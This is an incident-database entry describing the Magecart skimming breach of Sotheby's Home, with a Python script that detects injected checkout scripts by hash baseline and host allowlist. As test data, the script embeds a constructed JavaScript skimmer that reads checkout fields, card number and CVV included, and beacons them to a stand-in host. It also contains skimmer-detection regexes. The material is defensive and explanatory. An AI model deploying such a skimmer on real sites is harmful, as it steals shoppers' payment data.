
Cyber Incident Victim: Sotheby's

Date:

Mar 2017

Location:

United States of America

Summary

A British auction house's e-commerce platform was compromised by Magecart digital skimming code, which operated undetected for more than a year. The injected code targeted the checkout payment form to harvest customer names, addresses, email addresses, and full payment card details, including expiration dates and CVV codes. The attack was a direct compromise of the merchant's own website rather than of a third-party supplier, mirroring techniques observed in other high-profile Magecart breaches of the period. The organization removed the code promptly upon discovery, but the exact date of initial compromise could not be determined. The incident primarily affected U.S. customers of the company's home goods marketplace; based on patterns from comparable breaches, the stolen card data was likely to be resold on criminal platforms within days of exfiltration.

CIA Posture: Available to members

Motives: 1 motive

Tactics, Techniques & Procedures: 1 technique

Threat Actors: 0 actors

Type: Available to members

Location: Available to members

Description

Sotheby's disclosed a cybersecurity incident involving its e-commerce platform Sotheby's Home (formerly Viyet), in which malicious third parties injected digital skimming code into the website. The auction house detected and removed the malicious code on October 10, 2018, but forensic analysis showed the compromise had persisted since at least March 1, 2017. This exposure window of at least 19 months left an undetermined number of customer payment records at risk, because investigators could not establish the exact initial intrusion date; the earliest confirmed date is a lower bound, not the start of the compromise. The skimming code targeted payment information submitted through the website's checkout form, capturing names, addresses, email addresses, payment card numbers, expiration dates, and CVV security codes at the moment the customer submitted the transaction.


The attack methodology involved direct compromise of the merchant's own website rather than infiltration of a third-party supplier, aligning with techniques observed in contemporaneous Magecart campaigns against British Airways and Newegg. Sotheby's delayed public notification by nearly two months after removing the code, raising potential GDPR compliance concerns even though the platform primarily served U.S. customers. Historical patterns from similar breaches indicate that stolen payment data often appears on dark web marketplaces within days of exfiltration, as documented in RiskIQ's analysis of earlier Magecart operations. Multiple threat actor groups were known to deploy overlapping skimming techniques during this period, with some sabotaging rival skimmers on the same site to monopolize the illicit proceeds. The extended dwell time before detection exposed gaps in Sotheby's monitoring of its own web infrastructure: code injected directly into the checkout page went unnoticed for well over a year. Sotheby's disclosure confirmed no specific data misuse or fraudulent transactions, though the scale of potential impact remained unquantified because the breach chronology was uncertain.
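The two technical points above, a skimmer that hooks the checkout form and reads every field at submit time, and a merchant that had no baseline against which a newly injected script would stand out, can be illustrated with a small script-inventory audit. The following is an added example written for this page, not code from Sotheby's or from the incident report; the page markup, the skimmer snippet, the hostnames (all under the reserved `.example` TLD) and the baseline are constructed here. The real Sotheby's Home page and the real skimmer are not public, so the skimmer body is only a generic illustration of the three behaviours any form skimmer needs: hook the form, read field values, send them to a host the merchant does not use.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect every <script> on a page as (src, inline_body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False


def script_inventory(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Heuristics for the three behaviours a form skimmer needs: hook the form,
# read field values, and send them somewhere. All three must match.
_HOOK = re.compile(r"addEventListener\s*\(\s*['\"](submit|click|change)['\"]|\.onsubmit\s*=|\.onclick\s*=")
_READ = re.compile(r"\.value\b|FormData\s*\(")
_EXFIL = re.compile(r"new\s+Image\s*\(|fetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|\.src\s*=")


def looks_like_skimmer(body):
    return bool(_HOOK.search(body) and _READ.search(body) and _EXFIL.search(body))


def exfil_hosts(body):
    """Hostnames of absolute URLs referenced from a script body."""
    return {urlparse(u).hostname for u in re.findall(r"https?://[^\s'\"]+", body)}


def audit_checkout_page(html, baseline_inline_hashes, allowed_hosts):
    """Return (finding, detail) tuples for scripts that deviate from the baseline."""
    findings = []
    for src, body in script_inventory(html):
        if src is not None:
            host = urlparse(src).hostname      # None for first-party relative paths
            if host is not None and host not in allowed_hosts:
                findings.append(("unexpected-script-host", host))
            continue
        digest = sha256_hex(body)
        if digest not in baseline_inline_hashes:
            findings.append(("unknown-inline-script", digest[:16]))
            if looks_like_skimmer(body):
                for host in sorted(exfil_hosts(body) - allowed_hosts):
                    findings.append(("skimmer-like-exfil", host))
    return findings


# Constructed checkout page: one first-party script, one payment-provider
# script, one inline analytics stub. This is the known-good baseline.
BASELINE_HTML = """
<html><body>
<form id="checkout" action="/pay" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v1/"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>
"""

# Constructed skimmer, appended directly to the merchant's own markup the way
# the incident describes (no third-party supplier involved). Illustrative only.
SKIMMER = """
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://stats-cdn.example/c.gif?d=' + btoa(JSON.stringify(d));
});
"""
COMPROMISED_HTML = BASELINE_HTML.replace("</body>", "<script>" + SKIMMER + "</script></body>")

ALLOWED_HOSTS = {"js.payments.example"}
BASELINE_HASHES = {sha256_hex(body) for src, body in script_inventory(BASELINE_HTML) if src is None}

if __name__ == "__main__":
    for finding in audit_checkout_page(COMPROMISED_HTML, BASELINE_HASHES, ALLOWED_HOSTS):
        print(*finding)
```

Run against the baseline page the audit is silent; run against the compromised page it reports an inline script whose hash is not in the baseline and flags `stats-cdn.example` as a skimmer-like exfiltration host. The point is the baseline: a merchant that hashes the scripts on its checkout page after each deployment and re-checks the live page on a schedule would have noticed an unexpected inline block within hours rather than months. The behavioural regexes are deliberately crude and will miss obfuscated skimmers; the hash and host allowlist checks do not depend on them.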

Sources
Sources available to members
1 source